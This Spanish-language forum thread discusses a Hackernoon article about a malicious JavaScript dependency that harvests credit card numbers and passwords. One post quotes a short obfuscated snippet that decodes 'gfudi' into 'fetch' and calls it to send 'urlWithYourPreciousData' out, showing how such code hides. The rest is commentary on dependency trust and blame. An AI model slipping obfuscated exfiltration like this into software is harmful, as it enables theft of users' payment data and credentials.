Precioso: "I’m harvesting credit card numbers and passwords"

bLaKnI

@AikonCWD, esto creo te gustará. Y a otros también. Check this out:

I’m harvesting credit card numbers and passwords from your site. Here’s how.

Fuente del artículo: https://hackernoon.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5

No copio & pego el articulo, por no creerlo necesario. Si lo fuese, edito #1.

Saludos.

5
Troyer

Interesante y sinceramente, lo veo posible porque hoy en día hay tantas dependencias que nadie pierde el tiempo mirando que está instalando en cascada.

Al final vamos a tener que ir cambiando de número de la tarjeta de crédito cada 6 meses.

Camp1

Mientras lo leía parecía que estaba en una película de esas que te cuenta cómo se hizo el famoso robo a X, mis dieses!

1
HeXaN

Todo culpa de JS, para variar.

1 1 respuesta
willy_chaos

#4 bueno mas que de JS , realmente la culpa es de los developers por no haber mirado un poco por encima que hace ese codigo. Ha elegido JS como podia haber elegido Java / PHP / Python...

no es por defender a JS, a mi no me gusta la verdad, pero en ese caso no es culpa del lenguaje.

1 respuesta
Vashealer

#5 mirar un poco por encima? jajaj vas a leer un minificado que tiene :

const i = 'gfudi';
const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join('');
self[k(i)](urlWithYourPreciousData);

y vas a sospechar, no?

“gfudi” is just “fetch” with each letter shifted up by one. Hard core cryptography right there. self is an alias for window.

1 1 respuesta
willy_chaos

#6 no digo que en ese caso el colega no lo haya ofuscado tela, pero me se de mucha gente de

  • instalo esta libreria,
  • porque? la necesitas?
  • nah por si acaso...

(y ahi se queda esa libreria)

1 respuesta
Lecherito

#7 Y el problema sigue siendo de JS, quitas una libreria que no sabes si estas usando? LUL

B
spoiler
1 1 respuesta
squa1o

#9 Te acabas de cargar el hilo.

1 respuesta
B

Lo siento :/

Es que me sonaba demasiado peliculero el tema y eso. Sobretodo que nadie lo hubiera visto. Cuando habrá un montón de gente que en el momento que una librería se convierte en popular la examine para ver si puede sacar provecho de ella.

1 respuesta
kNG17

Da para capitulo de black mirror, cómo js se carga el mundo tal y como lo conocemos

1
Camp1

#11 Creo que todos lo habiamos leido pero obviamente se discute el si hubiese pasado. Y como dice #10 has contado el final de la peli, al menos mete un spoiler o algo.

1

Usuarios habituales